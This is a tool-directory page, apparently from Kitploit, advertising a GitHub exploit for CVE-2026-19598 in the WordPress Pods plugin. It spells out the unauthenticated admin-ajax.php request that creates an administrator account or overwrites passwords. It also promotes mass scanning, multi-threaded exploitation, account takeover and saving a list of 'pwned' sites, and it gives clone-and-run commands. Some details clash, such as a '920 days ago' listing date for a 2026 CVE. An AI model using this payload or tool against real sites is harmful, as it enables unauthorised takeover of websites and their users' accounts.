Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-19598- — Exploits CVE-2026-19598 in WordPress Pods plugin to create admin accounts or overwrite passwords via unauthenticated AJAX request, with mass scanning and multi-threading support. | Kitploit
उपकरण/GitHubGitHub/0xcyp1337/cve-2026-19598-
Privilege EscalationVulnerability ScannersExploitationWeb Application ExploitationPenetration Testing
GitHub0xcyp1337/cve-2026-19598-

CVE-2026-19598-

Exploits CVE-2026-19598 in WordPress Pods plugin to create admin accounts or overwrite passwords via unauthenticated AJAX request, with mass scanning and multi-threading support.

रिपॉजिटरी देखें
920 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
अनुरोधित भाषा में सामग्री उपलब्ध नहीं है। अंग्रेज़ी संस्करण दिखाया जा रहा है।

CVE-2026-19598 — Pods WordPress Plugin Unauthenticated Privilege Escalation

Python 3.6+ CVSS Author

Critical Unauthenticated Privilege Escalation (CVSS 9.8) — WordPress Pods Plugin ≤ 3.3.9

This tool exploits CVE-2026-19598, a vulnerability in the WordPress Pods plugin that allows unauthenticated attackers to create new administrator accounts or overwrite existing user passwords via the admin-ajax.php endpoint.


⚠️ Vulnerability Overview

Technical Details

The vulnerability exists in the pods_admin AJAX action. Due to improper permission checks, the save_user method can be called without authentication when the meta-box-loader parameter is present. This allows an attacker to:

  1. Create new admin users with arbitrary credentials
  2. Overwrite existing user passwords by specifying a user ID
  3. Escalate privileges from unauthenticated to full admin access

Attack Vector

POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator

The plugin fails to verify that the user making the request has proper capabilities, and the meta-box-loader parameter bypasses the intended security checks.


🚀 Features

  • ✅ Single-target exploitation — create admin or overwrite password
  • ✅ Mass scanning & exploitation — load targets from file
  • ✅ Multi-threading — fast parallel processing
  • ✅ Automatic login verification — confirm admin access
  • ✅ Overwrite mode — take over existing user accounts
  • ✅ Custom credentials — set your own username/password
  • ✅ Progress bar with spinner and real-time stats
  • ✅ Colored output for easy reading
  • ✅ Results saving — pods_pwned.txt with all exploited targets
  • ✅ No external dependencies — uses Python standard library + requests

📥 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/0xCyp1337/CVE-2026-19598-.git
cd CVE-2026-19598
python3 CVE-2026-19598.py

# Install dependencies (only requests needed)
pip install requests
टूल डाउनलोड करें
PropertyValue
CVE IDCVE-2026-19598
CVSS Score9.8 (Critical)
CWECWE-284 — Improper Access Control
Affected ProductWordPress Pods Plugin ≤ 3.3.9
Patched Version3.3.9.1
Auth RequiredTIDAK (unauthenticated)
StatusActive Exploitation